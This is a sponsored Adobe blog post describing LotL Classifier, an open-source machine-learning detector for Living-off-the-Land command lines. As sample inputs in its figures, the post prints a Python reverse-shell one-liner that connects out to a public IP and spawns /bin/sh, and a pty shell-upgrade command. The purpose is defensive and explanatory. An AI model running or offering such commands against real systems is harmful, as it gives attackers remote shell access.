Editor’s note: The following is a sponsored blog post from Adobe.
In security, “Living off the Land” (LotL or LOTL)-type attacks are not new. Bad actors have been using legitimate software and functions to target systems and carry out malicious attacks for many years. And although it’s not novel, LotL is still one of the preferred approaches even for highly skilled attackers. Why? Because hackers tend not to reinvent the wheel and prefer to keep a low profile, i.e., leave no “footprints,” such as random binaries or scripts on the system. Interestingly, these stealthy moves are exactly why it’s often very difficult to determine which of these actions are from a valid system administrator and which are from an attacker. It’s also why static rules can trigger so many false positives and why compromises can go undetected.
Most antivirus vendors do not treat executed commands (from a syntax and vocabulary perspective) as an attack vector, and most of the log-based alerts are static, limited in scope, and hard to update. Furthermore, classic LotL detection mechanisms are noisy and somewhat unreliable, generating a high number of false positives, and because typical rules grow organically, it becomes easier to retire and rewrite the rules rather than maintain and update them.
The security intelligence team at Adobe set out to help fix this problem. Using open source and other representative incident data, we developed a dynamic and high-confidence program, called LotL Classifier, and then we opensourced it to the broader community.
The LotL Classifier is unique because it uses a supervised learning approach - this means it maps an input to an output based on example input-output pairs.
LotL Classifier has two basic components:
- Feature extraction
- An ML-based Classifier algorithm
Feature Extraction
The Feature Extraction (FE) component takes the input of open source and other representative incident data, also known as malware attacks, and actual log data, and creates a data set that describes commands, based on hundreds of keywords, regexes, and static rules to help detect similarities.
Figure 1: Feature extraction
The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed. Then they quickly browse through parameters and, if present in the command, they look at domain names, IP addresses, and port numbers. So, we designed the feature extraction process to mimic the typical human process and created labels for the same classes of features: Binaries, Keywords, Patterns, Paths, Networks, and Similarity.
Figure 2: An example of generated tags for a typical reverse shell.
Command: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("11.12.133.14"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' |
Extracted features: IP_LOOPBACK IP_PUBLIC PATH_/BIN/SH COMMAND_EXPORT COMMAND_PYTHON COMMAND_FOR KEYWORD_-C KEYWORD_SOCKET KEYWORD_OS KEYWORD_PTY KEYWORD_PTY.SPAWN python_spawn python_socket python_shell import_pty |
Prediction: BAD |
Figure 3: Similarity techniques
Similarity Testing
Once the data set is complete, the FE component conducts a similarity test as a secondary validation mechanism. To accomplish this, we use the BLEU (BiLingual Evaluation Understudy) metric: A number between zero and one, the BLEU score is typically used in machine translation to measure the similarity between two proposed translations of a sentence. For the LotL Classifier, we use the BLEU score to express the functional similarity of two command lines that share common patterns in the parameters. Intuitively, the Levenshtein distance is also a good candidate for this task. However, while conducting our manual validation, we arrived at the conclusion that weighted BLEU provides better results.
Figure 4: An example of a well-known command generating a similarity/LOOKS_LIKE_KNOWN_LOL label, bypassing the ML classification
Command: python -c "import pty;pty.spawn('/bin/sh')" |
Extracted features: PATH_/BIN/SH COMMAND_PYTHON KEYWORD_-C KEYWORD_PTY KEYWORD_PTY.SPAWN python_spawn python_shell import_pty LOOKS_LIKE_KNOWN_LOL |
Prediction: BAD |
In simpler terms: If it looks like a duck, swims like a duck, and quacks like a duck, then it probably is a duck.
Machine Learning (ML) Classifier
Using the tags generated in the feature extraction process, the data set is now ready for the decision component of the project. The ML Classifier takes the data set and labels it as good or bad. During testing, we used a variety of different classifiers, but we got the best results in terms of accuracy and speed using the RandomForest classifier. Using five-fold validation, the average F1 score was 0.95 with a standard deviation of 0.013 in the latest in-house training using our test data set representative of “real-world” situations.
In the end, the project produces two main sets of information regarding a command:
- Decides (or classifies) the data in the input set as good or bad,
- Creates a set of tags that describe the command itself, label, which can be pipelined in different rules-based automation (RBA) or anomaly types of projects, such as our recently open-sourced One Stop Anomaly Shop (OSAS).
A Final Note
We have recently open sourced the project at http://github.com/adobe/libLOL. While the RandomForest classifier is baked in, if you choose to use a different classifier, you can download our OSAS project to help you do that. You can also experiment with different classifiers and compare the results with your own datasets.
We hope you find the tool useful. We are open to any feedback to continue to improve it via our GitHub project page.